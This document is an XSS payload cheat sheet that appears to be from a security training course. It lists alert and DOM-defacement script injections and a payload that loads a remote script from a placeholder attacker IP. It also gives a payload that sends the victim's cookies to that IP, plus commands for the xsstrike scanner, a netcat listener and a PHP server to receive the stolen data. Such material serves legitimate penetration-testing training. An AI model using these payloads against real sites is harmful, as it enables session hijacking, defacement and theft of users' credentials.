XSS

Basic Payloads

Basic alert XSS

<script>alert(window.origin)</script>

Plaintext injection

<plaintext>

Basic print execution

<script>print()</script>

HTML-based alert XSS

<img src="" onerror=alert(window.origin)>

DOM Manipulation

Change background color

<script>document.body.style.background = "#141d2b"</script>

Change background image

<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>

Change website title

<script>document.title = 'HackTheBox Academy'</script>

Overwrite website's main body

<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>

Remove specific HTML element

<script>document.getElementById('urlform').remove();</script>

Advanced Payloads

Load remote script

<script src="http://OUR_IP/script.js"></script>

Send cookie data to attacker

<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>

---

Common Commands

Scanning and Exploitation

Run xsstrike on a URL parameter

python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"

Networking

Start netcat listener

sudo nc -lvnp 80

Start PHP server

sudo php -S 0.0.0.0:80